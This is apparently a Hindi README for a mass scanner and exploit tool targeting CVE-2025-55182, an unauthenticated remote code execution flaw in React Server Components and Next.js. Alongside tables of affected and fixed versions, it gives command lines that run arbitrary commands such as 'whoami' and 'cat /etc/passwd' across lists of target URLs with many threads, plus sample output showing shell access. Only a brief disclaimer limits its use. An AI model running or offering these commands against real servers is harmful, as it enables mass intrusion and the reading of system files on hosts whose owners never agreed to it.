
स्वचालित स्कैनर CVE-2025-55182 के लिए: React Server Components और Next.js में एक गंभीर RCE भेद्यता।
CVE-2025-55182 (React2Shell) दूरस्थ कोड निष्पादन भेद्यता के लिए बैच डिटेक्शन और सत्यापन उपकरण।
⚠️ CVSS 10.0 गंभीर भेद्यता | React Server Components और Next.js 15.x/16.x संस्करणों को प्रभावित करता है | केवल अधिकृत सुरक्षा परीक्षण के लिए
CVE-2025-55182 (उर्फ "React2Shell") एक CVSS 10.0 पूर्ण अंक गंभीरता वाली अप्रमाणित दूरस्थ कोड निष्पादन (RCE) भेद्यता है।
यह भेद्यता React Server Components (RSC) के react-server पैकेज में RSC "Flight" प्रोटोकॉल को संसाधित करते समय असुरक्षित डिसेरियलाइज़ेशन समस्या के कारण उत्पन्न होती है। हमलावर विशेष रूप से तैयार HTTP अनुरोध भेजकर भेद्यता वाले सर्वर पर मनमाना कोड निष्पादित कर सकते हैं।
चूंकि Next.js RSC "Flight" प्रोटोकॉल का उपयोग करता है, इसलिए create-next-app के साथ बनाए गए डिफ़ॉल्ट कॉन्फ़िगरेशन एप्लिकेशन भी डेवलपर द्वारा कोई अतिरिक्त कोड लिखे बिना शोषित किए जा सकते हैं। 5 दिसंबर 2025 से इस भेद्यता का सक्रिय रूप से शोषण होने का पता चला है।
React Server Components प्रभावित संस्करण:
| पैकेज नाम | प्रभावित संस्करण |
|---|---|
| react-server-dom-webpack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-turbopack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-parcel | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
Next.js प्रभावित संस्करण (App Router का उपयोग करते हुए):
अन्य संभावित रूप से प्रभावित RSC फ्रेमवर्क/उपकरण:
⚠️ महत्वपूर्ण नोट: इस भेद्यता का कोई ज्ञात अस्थायी शमन उपाय नहीं है, सुरक्षित संस्करण में अपग्रेड करना ही एकमात्र फिक्स है।
अनुशंसित अपग्रेड संस्करण:
आधिकारिक रूप से प्रदान किए गए fix-react2shell-next npm पैकेज का उपयोग प्रभावित Next.js एप्लिकेशन को अपडेट करने में सहायता के लिए किया जा सकता है।
pip install requests
# बैच स्कैन (urls.txt से लक्ष्य पढ़ें)
python CVE-2025-55182.py -f urls.txt
# एकल लक्ष्य परीक्षण
python CVE-2025-55182.py -u http://192.168.1.100:3000
# whoami कमांड निष्पादित करें
python CVE-2025-55182.py -f urls.txt -c "whoami"
# hostname कमांड निष्पादित करें
python CVE-2025-55182.py -u http://target.com -c "hostname"
# फ़ाइल पढ़ें
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"
# थ्रेड्स और टाइमआउट निर्दिष्ट करें
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15
# कस्टम आउटपुट फ़ाइल
python CVE-2025-55182.py -f urls.txt -o scan_results.csv
# साइलेंट मोड (केवल भेद्यता URL आउटपुट करें)
python CVE-2025-55182.py -f urls.txt -q
प्रति पंक्ति एक URL, उदाहरण:
http://192.168.1.10:3000
http://192.168.1.11:3000
+---------------------------------------------------------------+
| ### ## ####### ## ## ######## ## ####### |
| #### ## ## ## ## ## ## ## |
| ## ## ## ##### ### ## ## ####### |
| ## #### ## ## ## ## ## ## ## |
| ## ### ####### ## ## ## #### ####### |
| |
| CVE-2025-55182 RCE Scanner |
+---------------------------------------------------------------+
============================================================
[ CONFIGURATION ]
============================================================
> Targets: 10
> Threads: 20
> Command: id
============================================================
[ SCANNING ]
============================================================
[14:30:25] [VULN] http://192.168.1.10:3000
'--> uid=1000(www-data)
[14:30:26] [SAFE] http://192.168.1.11:3000
+==========================================================+
| SCAN COMPLETE |
+==========================================================+
| Total Targets : 10 |
| Vulnerable : 1 |
| Safe : 9 |
| Errors : 0 |
+==========================================================+
स्कैन परिणाम CSV प्रारूप में सहेजे जाते हैं, जिनमें निम्नलिखित फ़ील्ड होते हैं:
url - लक्ष्य URLstatus - HTTP स्थिति कोडvulnerable - क्या भेद्यता मौजूद हैoutput - कमांड निष्पादन आउटपुटerror - त्रुटि संदेशयह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, कृपया इसका उपयोग अवैध उद्देश्यों के लिए न करें। उपयोगकर्ता को संबंधित जिम्मेदारी स्वयं वहन करनी होगी।
| मुख्य संस्करण | प्रभावित संस्करण सीमा | फिक्स संस्करण |
|---|
| 16.0.x | ≤ 16.0.6 | 16.0.7 |
| 15.5.x | ≤ 15.5.6 | 15.5.7 |
| 15.4.x | ≤ 15.4.7 | 15.4.8 |
| 15.3.x | ≤ 15.3.5 | 15.3.6 |
| 15.2.x | ≤ 15.2.5 | - |
| 15.1.x | ≤ 15.1.8 | - |
| 15.0.x | ≤ 15.0.4 | - |
| 14.x Canary | ≥ 14.3.0-canary.77 | - |
| पैरामीटर | स्पष्टीकरण | डिफ़ॉल्ट मान |
|---|
-f, --file | URL सूची फ़ाइल | urls.txt |
-u, --url | एकल लक्ष्य URL | - |
-t, --threads | समवर्ती थ्रेड्स की संख्या | 20 |
--timeout | अनुरोध टाइमआउट (सेकंड) | 10 |
-o, --output | आउटपुट CSV फ़ाइल | results.csv |
-c, --command | निष्पादित किया जाने वाला कमांड | id |
-q, --quiet | साइलेंट मोड | false |